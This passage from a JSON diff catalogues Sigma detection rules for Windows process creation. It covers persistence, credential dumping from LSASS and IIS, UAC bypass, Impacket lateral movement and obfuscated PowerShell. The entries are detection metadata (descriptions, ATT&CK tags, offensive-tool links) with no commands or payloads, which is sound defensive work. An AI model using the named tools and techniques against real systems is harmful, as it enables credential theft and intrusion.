"26488ad0-f9fd-4536-876f-52fea846a2e4", + "value": "SharPersist Usage", + 
"meta": {
+ "refs": [
+ "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit",
+ "https://github.com/mandiant/SharPersist",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1053"
+ ],
+ "creation_date": "2022/09/15",
+ "filename": "proc_creation_win_hack_sharpersist.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller",
+ "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d",
+ "value": "SharpLdapWhoami",
+ "meta": {
+ "refs": [
+ "https://github.com/bugch3ck/SharpLdapWhoami",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033",
+ "car.2016-03-001"
+ ],
+ "creation_date": "2022/08/29",
+ "filename": "proc_creation_win_hack_sharpldapwhoami.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Programs that use the same command line flags"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120",
+ "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9",
+ "value": "SysmonEOP Hack Tool",
+ "meta": {
+ "refs": [
+ "https://github.com/Wh04m1001/SysmonEoP",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml"
+ ],
+ "tags": [
+ "cve.2022.41120",
+ "attack.t1068",
+ "attack.privilege_escalation"
+ ],
+ "creation_date": "2022/12/04",
+ "filename": "proc_creation_win_hack_sysmoneop.yml",
+ "author": "Florian Roth",
+ "level": "critical",
+ "falsepositive": 
[
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of Windows Credential Editor (WCE)",
+ "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df",
+ "value": "Windows Credential Editor",
+ "meta": {
+ "refs": [
+ "https://www.ampliasecurity.com/research/windows-credentials-editor/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001",
+ "attack.s0005"
+ ],
+ "creation_date": "2019/12/31",
+ "filename": "proc_creation_win_hack_wce.yml",
+ "author": "Florian Roth",
+ "level": "critical",
+ "falsepositive": [
+ "Another service that uses a single -s command line switch"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same",
+ "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c",
+ "value": "HandleKatz LSASS Dumper Usage",
+ "meta": {
+ "refs": [
+ "https://github.com/codewhitesec/HandleKatz",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ],
+ "creation_date": "2022/08/18",
+ "filename": "proc_creation_win_handlekatz.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against",
+ "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf",
+ "value": "Password Cracking with Hashcat",
+ "meta": {
+ "refs": [
+ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat",
+ "https://hashcat.net/wiki/doku.php?id=hashcat",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1110.002"
+ ],
+ "creation_date": "2021/12/27",
+ "filename": "proc_creation_win_hashcat.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Tools that accidentally use the same command line flags and values"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.",
+ "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e",
+ "value": "File Download with Headless Browser",
+ "meta": {
+ "refs": [
+ "https://twitter.com/mrd0x/status/1478234484881436672?s=12",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ],
+ "creation_date": "2022/01/04",
+ "filename": "proc_creation_win_headless_browser_file_download.yml",
+ "author": "Sreeman, Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Identifies usage of hh.exe executing recently modified .chm files.",
+ "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84",
+ "value": "HH.exe Execution",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.001"
+ ],
+ "creation_date": "2019/10/24",
+ "filename": "proc_creation_win_hh_chm.yml",
+ "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.",
+ "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89",
+ "value": "HH.exe Remote CHM File Execution",
+ "meta": {
+ "refs": [
+ "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.001"
+ ],
+ "creation_date": "2022/09/29",
+ "filename": "proc_creation_win_hh_chm_http.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. 
This folder doesn't require admin privillege to be written and executed from.",
+ "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728",
+ "value": "Writing Of Malicious Files To The Fonts Folder",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml"
+ ],
+ "tags": [
+ "attack.t1211",
+ "attack.t1059",
+ "attack.defense_evasion",
+ "attack.persistence"
+ ],
+ "creation_date": "2020/04/21",
+ "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml",
+ "author": "Sreeman",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.",
+ "uuid": "40f9af16-589d-4984-b78d-8c2aec023197",
+ "value": "High Integrity Sdclt Process",
+ "meta": {
+ "refs": [
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/6",
+ "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.defense_evasion",
+ "attack.t1548.002"
+ ],
+ "creation_date": "2020/05/02",
+ "filename": "proc_creation_win_high_integrity_sdclt.yml",
+ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine",
+ "uuid": 
"36d88494-1d43-4dc0-b3fa-35c8fea0ca9d",
+ "value": "CreateMiniDump Hacktool",
+ "meta": {
+ "refs": [
+ "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ],
+ "creation_date": "2019/12/22",
+ "filename": "proc_creation_win_hktl_createminidump.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata",
+ "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177",
+ "value": "UAC Bypass Tool UACMe Akagi",
+ "meta": {
+ "refs": [
+ "https://github.com/hfiref0x/UACME",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1548.002"
+ ],
+ "creation_date": "2021/08/30",
+ "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml",
+ "author": "Christian Burkard, Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)",
+ "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4",
+ "value": "HTML Help Shell Spawn",
+ "meta": {
+ "refs": [
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/",
+ 
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.001",
+ "attack.t1218.010",
+ "attack.t1218.011",
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.t1059.003",
+ "attack.t1059.005",
+ "attack.t1059.007",
+ "attack.t1047",
+ "attack.t1566",
+ "attack.t1566.001",
+ "attack.initial_access",
+ "attack.t1218"
+ ],
+ "creation_date": "2020/04/01",
+ "filename": "proc_creation_win_html_help_spawn.yml",
+ "author": "Maxim Pavlunin",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation",
+ "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b",
+ "value": "Suspicious HWP Sub Processes",
+ "meta": {
+ "refs": [
+ "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/",
+ "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1",
+ "https://twitter.com/cyberwar_15/status/1187287262054076416",
+ "https://blog.alyac.co.kr/1901",
+ "https://en.wikipedia.org/wiki/Hangul_(word_processor)",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1566.001",
+ "attack.execution",
+ "attack.t1203",
+ "attack.t1059.003",
+ "attack.g0032"
+ ],
+ "creation_date": "2019/10/24",
+ "filename": 
"proc_creation_win_hwp_exploits.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files",
+ "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9",
+ "value": "Use Icacls to Hide File to Everyone",
+ "meta": {
+ "refs": [
+ "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.001"
+ ],
+ "creation_date": "2022/07/18",
+ "filename": "proc_creation_win_icacls_deny.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate use"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.",
+ "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41",
+ "value": "Microsoft IIS Connection Strings Decryption",
+ "meta": {
+ "refs": [
+ "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003"
+ ],
+ "creation_date": "2022/09/28",
+ "filename": "proc_creation_win_iis_connection_strings_decryption.yml",
+ "author": "Tim Rauch",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)",
+ "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e",
+ "value": "Disable Windows IIS HTTP Logging",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.002"
+ ],
+ "creation_date": "2022/01/09",
+ "filename": "proc_creation_win_iis_http_logging.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords",
+ "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701",
+ "value": "Microsoft IIS Service Account 
Password Dumped",
+ "meta": {
+ "refs": [
+ "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html",
+ "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA",
+ "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003"
+ ],
+ "creation_date": "2022/11/08",
+ "filename": "proc_creation_win_iis_service_account_password_dumped.yml",
+ "author": "Tim Rauch, Janantha Marasinghe",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity",
+ "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99",
+ "value": "ImagingDevices Unusual Parent Or Child Processes",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution"
+ ],
+ "creation_date": "2022/09/27",
+ "filename": "proc_creation_win_imaging_devices_unusual_parents.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)",
+ "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19",
+ 
"value": "Impacket Tool Execution",
+ "meta": {
+ "refs": [
+ "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1557.001"
+ ],
+ "creation_date": "2021/07/24",
+ "filename": "proc_creation_win_impacket_compiled_tools.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Legitimate use of the impacket tools"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework",
+ "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2",
+ "value": "Impacket Lateralization Detection",
+ "meta": {
+ "refs": [
+ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py",
+ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py",
+ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py",
+ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047",
+ "attack.lateral_movement",
+ "attack.t1021.003"
+ ],
+ "creation_date": "2019/09/03",
+ "filename": "proc_creation_win_impacket_lateralization.yml",
+ "author": "Ecco, oscd.community, Jonhnathan Ribeiro",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.",
+ 
"uuid": "5f6a601c-2ecb-498b-9c33-660362323afa",
+ "value": "Root Certificate Installed From Susp Locations",
+ "meta": {
+ "refs": [
+ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
+ "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1553.004"
+ ],
+ "creation_date": "2022/09/09",
+ "filename": "proc_creation_win_import_cert_susp_locations.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).",
+ "uuid": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02",
+ "value": "Indirect Command Execution",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_cmd.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ],
+ "creation_date": "2019/10/24",
+ "filename": "proc_creation_win_indirect_cmd.yml",
+ "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community",
+ "level": "low",
+ "falsepositive": [
+ "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.",
+ "Legitimate usage of scripts." 
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of native Windows tool, forfiles to execute a file. Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.",
+ "uuid": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8",
+ "value": "Indirect Command Exectuion via Forfiles",
+ "meta": {
+ "refs": [
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a",
+ "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_command_execution_forfiles.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ],
+ "creation_date": "2022/10/17",
+ "filename": "proc_creation_win_indirect_command_execution_forfiles.yml",
+ "author": "Tim Rauch (rule), Elastic (idea)",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.",
+ "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b",
+ "value": "InfDefaultInstall.exe .inf Execution",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution",
+ "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218"
+ ],
+ "creation_date": "2021/07/13",
+ "filename": "proc_creation_win_infdefaultinstall.yml",
+ "author": "frack113",
+ 
"level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects encoded base64 MZ header in the commandline",
+ "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f",
+ "value": "Base64 MZ Header In CommandLine",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ],
+ "creation_date": "2022/07/12",
+ "filename": "proc_creation_win_inline_base64_mz_header.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec",
+ "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702",
+ "value": "Accessing WinAPI Via CommandLine",
+ "meta": {
+ "refs": [
+ "https://twitter.com/m417z/status/1566674631788007425",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1106"
+ ],
+ "creation_date": "2022/09/06",
+ "filename": "proc_creation_win_inline_win_api_access.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).",
+ "uuid": "ae215552-081e-44c7-805f-be16f975c8a2",
+ "value": "Suspicious Debugger Registration Cmdline",
+ "meta": {
+ "refs": [
+ "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/",
+ 
"https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1546.008"
+ ],
+ "creation_date": "2019/09/06",
+ "filename": "proc_creation_win_install_reg_debugger_backdoor.yml",
+ "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.",
+ "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc",
+ "value": "Interactive AT Job",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1053.002"
+ ],
+ "creation_date": "2019/10/24",
+ "filename": "proc_creation_win_interactive_at.yml",
+ "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely (at.exe deprecated as of Windows 8)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects Obfuscated use of Clip.exe to execute PowerShell",
+ "uuid": "b222df08-0e07-11eb-adc1-0242ac120002",
+ "value": "Invoke-Obfuscation CLIP+ Launcher",
+ "meta": {
+ "refs": [
+ "https://github.com/Neo23x0/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2020/10/13",
+ "filename": "proc_creation_win_invoke_obfuscation_clip.yml",
+ "author": "Jonathan Cheong, oscd.community",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block",
+ "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf",
+ "value": "Invoke-Obfuscation Obfuscated IEX Invocation",
+ "meta": {
+ "refs": [
+ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2019/11/08",
+ "filename": "proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml",
